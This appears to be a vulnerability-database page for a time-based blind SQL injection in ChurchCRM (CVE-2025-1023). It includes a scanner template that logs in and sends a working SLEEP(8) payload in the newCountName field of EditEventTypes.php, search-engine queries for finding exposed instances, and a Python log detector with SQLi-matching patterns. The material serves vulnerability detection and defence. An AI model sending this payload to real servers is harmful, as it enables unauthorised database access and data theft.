ChurchCRM - SQL Injection

CVE-2025-1023
Early Release

Description

A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Severity

Critical

CVSS Score

9.8

Exploit Probability

1%

Affected Product

churchcrm

Published Date

November 3, 2025

Template Author

kazgangap

CVE-2025-1023.yaml
id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.00706
    epss-percentile: 0.71338
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4b0a00483046022100f8703dfa6c3c1162348c4f804ef30f0c0da3c086305dc8fd8662e7e5d8c29b130221009e33488e5dd3671cf655c579bd898c556592719cfbe78594863040e1deb8ad91:922c64590222798bb761d5b6d8e72950
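# digest: 4b0a00483046022100f8703dfa6c3c1162348c4f804ef30f0c0da3c086305dc8fd8662e7e5d8c29b130221009e33488e5dd3671cf655c579bd898c556592719cfbe78594863040e1deb8ad91:922c64590222798bb761d5b6d8e72950

As an added defender-side example (not part of the template above or of ChurchCRM's code), the following Python mirrors the two signals the template's matchers rely on: it URL-decodes the EditEventTypes.php form body and looks for time-based SQL injection markers in fields such as newCountName, and it correlates a 500 response that arrived only after the 8-second delay the probe requests. The request records, field names other than those in the template, and the marker patterns are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Heuristic markers of time-based blind SQL injection probes (MySQL, PostgreSQL, MSSQL)
TIME_BASED_SQLI = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# A quote followed by AND/OR is the usual way a value breaks out of a string literal
QUOTE_BREAKOUT = re.compile(r"['\"]\s*(and|or)\b", re.I)

def decode_form_body(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into field -> first value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def find_sqli_fields(body: str) -> dict:
    """Return the decoded fields whose value carries a SQLi marker (empty dict if none)."""
    return {f: v for f, v in decode_form_body(body).items()
            if TIME_BASED_SQLI.search(v) or QUOTE_BREAKOUT.search(v)}

def flag_requests(records: list) -> list:
    """Flag POSTs to EditEventTypes.php on either signal the template relies on:
    a SQLi marker in the body, or a 500 returned after the 8-second delay the probe asks for."""
    flagged = []
    for r in records:
        if r["method"] != "POST" or r["path"] != "/EditEventTypes.php":
            continue
        reasons = []
        fields = find_sqli_fields(r["body"])
        if fields:
            reasons.append("sqli-marker:" + ",".join(sorted(fields)))
        if r["status"] == 500 and r["duration"] >= 8:
            reasons.append("slow-500")
        if reasons:
            flagged.append((r["id"], reasons))
    return flagged

# Constructed sample records (not real traffic); r1 reuses the probe body from the template
PROBE_BODY = ("EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName="
              "1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD")
BENIGN_BODY = "EN_tyid=1&newEvtName=Picnic&newEvtStartTime=10:30:00&newCountName=Adults&Action=ADD"
SAMPLE_RECORDS = [
    {"id": "r1", "method": "POST", "path": "/EditEventTypes.php", "body": PROBE_BODY, "status": 500, "duration": 8.4},
    {"id": "r2", "method": "POST", "path": "/EditEventTypes.php", "body": BENIGN_BODY, "status": 200, "duration": 0.2},
    {"id": "r3", "method": "POST", "path": "/EditEventTypes.php", "body": BENIGN_BODY, "status": 500, "duration": 9.1},
    {"id": "r4", "method": "GET", "path": "/EditEventTypes.php", "body": "", "status": 200, "duration": 0.1},
]

if __name__ == "__main__":
    for rid, reasons in flag_requests(SAMPLE_RECORDS):
        print(rid, reasons)
```

The slow-500 signal on its own (r3) is only a prompt to look closer, since any unrelated server error can be slow; the body marker is the stronger indicator.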
Score: 9.8

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-1023
CWE ID: CWE-89